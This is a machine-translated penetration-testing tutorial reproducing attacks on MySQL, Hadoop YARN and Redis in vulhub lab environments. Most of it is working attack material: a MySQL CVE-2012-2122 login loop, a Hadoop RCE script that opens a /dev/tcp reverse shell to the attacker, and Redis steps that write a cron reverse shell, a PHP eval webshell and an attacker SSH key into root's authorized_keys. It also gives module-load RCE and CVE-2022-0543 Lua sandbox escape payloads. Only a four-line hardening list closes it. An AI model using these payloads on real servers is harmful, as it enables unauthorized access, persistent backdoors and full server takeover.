Database Security-Redis Unauthorized&Hadoop&Mysql&Unauthorized Access&RCE Vulnerability Recurrence

Directory

  • Database Security – & amp;Redis & amp;Hadoop & amp;Mysql & amp;Unauthorized Access & amp;RCE
    • definition
    • Vulnerability recurrence
      • Mysql-CVE-2012-2122 vulnerability
      • Hadoop – Improper Configuration Unauthorized Trio & RCE Vulnerability
    • Redis-Unauthorized Access-Webshell &Task &Key&RCE, etc.
      • Vulnerability definition:
      • Vulnerability causes
      • Vulnerability hazards
      • Vulnerability recurrence
        • Redis-Unauthorized Access-Webshell & Scheduled Tasks &Keys &RCE
        • redis command execution (RCE)
        • redis sandbox bypass (CVE-2022-0543)
    • Reinforce ideas

Database Security – & amp;Redis & amp;Hadoop & amp;Mysql & amp;Unauthorized Access & amp;RCE

Definition

Unauthorized access vulnerabilities can be understood as flaws in addresses and authorization pages that require security configuration or permission authentication, allowing other users to directly access, thereby causing important permissions to be operated, and sensitive information such as databases or website directories to be leaked, including common unauthorized pages of ports. Unauthorized /admin.php /menu.php

Common unauthorized access vulnerabilities and default ports:
Default port statistics:

[21, 139, 873, 2049, 2181, 2182, 2375, 5601, 5672, 5900, 5901, 5984, 6379, 6443, 8080, 8088,
8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017] Wait

Vulnerability recurrence

Mysql-CVE-2012-2122 vulnerability

Shooting range environment: vulhub

image-20231013153406487

Open the environment and execute the payload:

Through the loop, login requests are continuously sent:

for i in `seq 1 1000`; do mysql -uroot -pwrong -h you-ip -P3306; done

After execution and waiting, it will directly enter the database:

image-20231013153545715

Successful entry:

image-20231013153607643

Hadoop-Improper Configuration Unauthorized Trio &RCE Vulnerability

Shooting range environment: vulhub

image-20231013155608954

Open the environment:

image-20231013155700044

payload:

#!/usr/bin/env python

import requests

target = 'http://192.168.100.134:8088/'
lhost = '192.168.100.1' # put your local host ip here, and listen at port 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {<!-- -->
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {<!-- -->
        'commands': {<!-- -->
            'command': '/bin/bash -i > & amp; /dev/tcp/%s/9999 0> & amp;1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

Turn on listening on the attack side:

nc -lvvp 9999

image-20231013155939650

Execute python script:

successful rebound

image-20231013160032398

Executable commands:

image-20231013160100075

Redis-Unauthorized Access-Webshell & amp;Task & amp;Key & amp;RCE, etc.

Redis is a very fast, open source, network-enabled, memory-based and persistent log-type, non-relational database;

Provides APIs in multiple languages, java/c/c++/c#/php/javascript/

Vulnerability definition:

The redis unauthorized access vulnerability is a vulnerability caused by the domain redis server having an earlier version and not setting a login password. The attacker can directly use the IP address and port of the redis server to complete the remote login of the redis server and complete subsequent control and control of the target server. use.

Cause of vulnerability

1.redis version 4.x/5.0.5 or previous versions

2.Redis is bound to 0.0.0.0:6379, and no firewall rules have been added to prevent other Fetion source IP access and other related security policies from being directly exposed to the public network.

3. If password authentication is not set (usually empty), you can remotely log in to the redis service without a password.

Vulnerability hazard

The attacker can use the redis command to write a scheduled task to the target server to rebound the shell and complete the control of the server. The attacker can use the redis command to write a webshell to the website directory to complete the initial control of the target website server. The most serious problem is that if redis is used as root When running, the hacker can write the SSH public key file to the root account and log in to the victim server directly through SSH.

Vulnerability Recurrence

Redis-Unauthorized Access-Webshell & amp; Scheduled Task & amp;Key & amp;RCE

Vulnerability verification:

Verification ideas:

The essence of the unauthorized access vulnerability is that the server login can be completed without a user password, so the verification idea is very simple. As long as the attack machine can be used to log in to the target server without a password, the vulnerability exists.

On the server side, start the redis service

Attack machine: redis-cli -h IP connects to the redis server

After logging in, enter info, and the content will appear to prove that the verification is successful.

Exploit:

How to exploit the vulnerability
1. Write scheduled task rebound shell
Utilization process
Goal: run redis server
Attack: Connect to redis server

Use the attack machine to write planned tasks into the server
config set dir /var/spool/cron //Writing directory plan folder
config set dbfilename root //The file name to be written, you can customize the name
set ssr "\\
\\
*/1****/bin/bash -i > & amp; /dev/tcp/attackIP/1234 0> & amp;1\\
\\
"
//Written content
save //save

Attack aircraft:
Execute nc -lvvp 1234 and wait for a moment. The hacker machine receives the shell of the target machine.
Use crontab -l to view the scheduled tasks originally written by the target machine


2. Write webshell
config set dir /var/www/html
config set dbfilename shell.php
set webshell "<?php @eval($_POST['cmd']); ?>" //webshell backdoor
save


3. Write SSH public key to log in
1) Open the SSH service on the attack machine and target machine
Command: systemctl start ssh (if not, use apt command to install or yum to install)

2) Create an SSH public key writable directory on the target machine
Command: mkdir /root/.ssh //ls -al to check whether the creation is successful

3) Clear the files in the /root/.ssh directory of the attacking machine to facilitate the identification of the SSH public key files that will be generated and stored in it later.
Command: rm -rf *

4) Generate the SSH public key on the attacking machine (you need to hit Enter three times in succession)
Command: ssh-keygen -t rsa

5) Switch to the public key storage directory on the attacking machine:
Command: cd /root/.ssh

6) Write the public key to 1.txt (use \\
 before and after to avoid mixing with other cached data in redis, otherwise it will always fail)
(echo -e "\\
\\
";cat id_rsa.pub;echo -e"\\
\\
") > 1.txt

Bring the text content of 1.txt into the process of logging in to the target redis server. You can then directly set the target file on the target machine and write it.
Order:
cat 1.txt | redis-cli -h target IP -x set crack //Set the content of 1.txt to crack (the name of the setting), and you can customize the name

Use redis-cli -h target IP to connect to the target machine and execute the following command to write the local SSH public key to the target machine.
config set dir /root/.ssh
config get dir
config set dbfilename authorized_keys
save
Use ssh to log in without a password on the attack machine
cd /root/.ssh
ssh -i id_rsa root@targetIP
redis command execution (RCE)

Shooting range environment: vulhub

image-20231013162258650

Open the environment and enter verification, enter info and execute, indicating that there is unauthorized:

image-20231013162227907

Automation tools use:

Use directly, dry directly

Tool address

payload:
python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"

python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "whoami"

//You can also replace the command with a rebound shell command to perform rebound.

Results of the:

image-20231013163059983

image-20231013163119547

Try another command again:

whoami

image-20231013163148899

Command executed successfully.

You can also change the command to a rebound shell command to perform a rebound.

redis sandbox bypass (CVE-2022-0543)

Shooting range environment: vulhub

image-20231013171127037

Open the environment

payload:
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0

//You can also switch to the rebound shell command to perform a rebound

Results of the:

image-20231013172043876

Reinforcement ideas

1.Upgrade
2. Modify 6379
3. Set up password authentication
4. Set up a firewall